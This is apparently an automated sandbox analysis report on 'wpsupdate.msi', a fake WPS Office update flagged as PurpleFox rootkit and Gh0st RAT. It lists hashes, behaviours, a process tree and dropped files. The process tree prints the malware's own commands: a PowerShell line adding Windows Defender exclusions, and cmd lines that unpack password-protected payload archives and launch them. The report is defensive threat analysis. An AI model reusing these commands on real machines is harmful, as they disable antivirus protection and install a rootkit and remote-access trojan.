Analysis

  • max time kernel
    150s
  • max time network
    160s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    19-11-2024 04:56

General

  • Target

    wpsupdate.msi

  • Size

    28.2MB

  • MD5

    ef294458016f546c5eebd07d2dd98bad

  • SHA1

    66bb14f670055272e12899d401b8668cad15fac9

  • SHA256

    c17c018f5df7a413dc053a325b6c291c9cd84f1b9e2415ffe205e02a7e5d6b4a

  • SHA512

    97ee150f49bb587147f30d2215174f5376420abd5d659a2c68d58bc67f823715030cc328eab7e11623f4ee8504f1f080ceb44ac2d6fca7c636ea8d7c936f0333

  • SSDEEP

    786432:r3pUIX4j1lP1FYKJGIC6rO9HN47EbHxjprMfy6s0A:zpUIIj1l9FxJGIzcteEt2e0A

Malware Config

Signatures

  • Detect PurpleFox Rootkit 1 IoCs

    Detect PurpleFox Rootkit.

  • Gh0st RAT payload 1 IoCs
  • Gh0strat

    Gh0st RAT is a remote access tool (RAT) whose source code is public; it has been used by multiple Chinese groups.

  • Gh0strat family
  • PurpleFox

    PurpleFox is an exploit kit, first seen in 2018, that is used to distribute other malware families.

  • Purplefox family
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.

  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Drops file in System32 directory 1 IoCs
  • Drops file in Program Files directory 23 IoCs
  • Drops file in Windows directory 8 IoCs
  • Executes dropped EXE 9 IoCs
  • Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 22 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 7 IoCs
  • Suspicious use of SendNotifyMessage 5 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\wpsupdate.msi
    1⤵
    • Enumerates connected drives
    • Event Triggered Execution: Installer Packages
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:1516
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4880
    • C:\Windows\system32\srtasks.exe
      C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3028
    • C:\Windows\System32\MsiExec.exe
      C:\Windows\System32\MsiExec.exe -Embedding 94C8925FDAC075AE237B5605BCE04F8E E Global\MSI0000
      2⤵
      • Drops file in Program Files directory
      • Modifies data under HKEY_USERS
      • Suspicious use of WriteProcessMemory
      PID:2680
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\TransformOptimisticContributor','C:\Program Files','C:\Program Files'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4416
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c start /min "" "C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe" x "C:\Program Files\TransformOptimisticContributor\YRtKSPCVXxSCmPuaAzactTPSddUXyw" -o"C:\Program Files\TransformOptimisticContributor\" -p"03621GQD}PR[O^Dmi;;h" -y & ping 127.0.0.1 -n 2 & start /min "" "C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe" x "C:\Program Files\TransformOptimisticContributor\WhlKFlLXxHUitNNcNwtpUJDzrKytNL" -x!1_WSEcydALszNI.exe -x!sss -x!1_OzasXnwPtTbfCAAsrowrLIIDEPUHpa.exe -x!1_ -x!1_ -x!sa -o"C:\Program Files\TransformOptimisticContributor\" -p"93629#*_tvw?-L5@gQl=" -y
        3⤵
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:3952
        • C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe
          "C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe" x "C:\Program Files\TransformOptimisticContributor\YRtKSPCVXxSCmPuaAzactTPSddUXyw" -o"C:\Program Files\TransformOptimisticContributor\" -p"03621GQD}PR[O^Dmi;;h" -y
          4⤵
          • Drops file in Program Files directory
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          PID:4460
        • C:\Windows\system32\PING.EXE
          ping 127.0.0.1 -n 2
          4⤵
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:1892
        • C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe
          "C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe" x "C:\Program Files\TransformOptimisticContributor\WhlKFlLXxHUitNNcNwtpUJDzrKytNL" -x!1_WSEcydALszNI.exe -x!sss -x!1_OzasXnwPtTbfCAAsrowrLIIDEPUHpa.exe -x!1_ -x!1_ -x!sa -o"C:\Program Files\TransformOptimisticContributor\" -p"93629#*_tvw?-L5@gQl=" -y
          4⤵
          • Drops file in Program Files directory
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          PID:4444
      • C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe
        "C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe" -number 177 -file file3 -mode mode3
        3⤵
        • Drops file in Program Files directory
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:632
      • C:\Program Files\TransformOptimisticContributor\wpsupdate.exe
        "C:\Program Files\TransformOptimisticContributor\wpsupdate.exe"
        3⤵
        • Writes to the Master Boot Record (MBR)
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        PID:3828
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious use of AdjustPrivilegeToken
    PID:1484
  • C:\Windows\System32\WScript.exe
    C:\Windows\System32\WScript.exe "C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.vbs"
    1⤵
    • Modifies data under HKEY_USERS
    PID:1796
  • C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.exe
    "C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.exe" install
    1⤵
    • Drops file in System32 directory
    • Drops file in Program Files directory
    • Executes dropped EXE
    PID:952
  • C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.exe
    "C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.exe" start
    1⤵
    • Drops file in Program Files directory
    • Executes dropped EXE
    PID:1080
  • C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.exe
    "C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.exe"
    1⤵
    • Drops file in Program Files directory
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:436
    • C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe
      "C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe" -number 151 -file file3 -mode mode3
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2724
      • C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe
        "C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe" -number 62 -file file3 -mode mode3
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:3836

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Config.Msi\e57d9f6.rbs (8KB)
  • C:\Program Files\TransformOptimisticContributor\2_WSEcydALszNI.exe (2.1MB)
  • C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe (577KB)
  • C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.vbs (2KB)
  • C:\Program Files\TransformOptimisticContributor\WhlKFlLXxHUitNNcNwtpUJDzrKytNL (1.5MB)
  • C:\Program Files\TransformOptimisticContributor\YRtKSPCVXxSCmPuaAzactTPSddUXyw (1.5MB)
  • C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.exe (832KB)
  • C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.wrapper.log (290B)
  • C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.wrapper.log (458B)
  • C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.wrapper.log (636B)
  • C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.xml (450B)
  • C:\Program Files\TransformOptimisticContributor\wpsupdate.exe (6.0MB)
  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1veqiqdc.l1i.ps1 (60B)
  • C:\Users\Admin\AppData\Roaming\kingsoft\office6\log\update\wpsupdate_2024_11_19.log (2KB)
  • C:\Windows\Installer\e57d9f5.msi (28.2MB; same size and hashes as the submitted wpsupdate.msi)
  • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\nKecPJAaIeFB.exe.log (1KB)
  • \??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2 (24.1MB)
  • \??\Volume{ff55cfe6-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{22748646-e610-4438-a06b-3a0bb54c46f1}_OnDiskSnapshotProp (6KB)
  • memory/632-57-0x000000002A460000-0x000000002A48F000-memory.dmp (188KB)
  • memory/952-78-0x0000000000D50000-0x0000000000E26000-memory.dmp (856KB)
  • memory/3836-109-0x0000000029E10000-0x0000000029E5D000-memory.dmp (308KB)
  • memory/3836-110-0x000000002BA30000-0x000000002BBED000-memory.dmp (1.7MB)
  • memory/4416-22-0x0000017BC0170000-0x0000017BC0192000-memory.dmp (136KB)